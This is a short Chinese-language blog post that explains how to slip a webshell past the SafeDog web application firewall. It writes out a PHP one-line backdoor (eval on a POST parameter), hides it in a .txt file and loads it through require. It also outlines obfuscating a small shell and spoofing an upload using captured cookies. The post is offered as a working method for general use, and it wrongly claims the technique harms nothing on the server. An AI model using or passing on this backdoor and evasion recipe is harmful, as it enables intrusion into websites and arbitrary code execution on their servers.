绕过网站安全狗,方法 适合所有

无意间在网上看到一遍文章说是可以绕过狗的,具体如下

1.生成一个txt或者其他可读文本,然后将其包含在所运行的程序中,如

<?php eval($_POST[ssd]); ?> 命名为 1.txt 这时候 狗是不会太多的检测的,一般可以正常放入进去。

然后在相应的访问页面进行 require 即可运行当前的文件为木马文件。

2.老方法新用途,准备网站进行cookie抓包,然后进行混淆小马,达到可以上传的时候进行欺骗上传,如果网站的过滤不严格的话还是可以正常上传的。

以上方法只在本地测试,在安装狗的服务器上进行测试过,前提是 我已经有了口令。 这些东西只是可以修改或者删除网页上的东西,不会对服务器早上什么危害。

你可能感兴趣的:(绕过网站安全狗,方法 适合所有)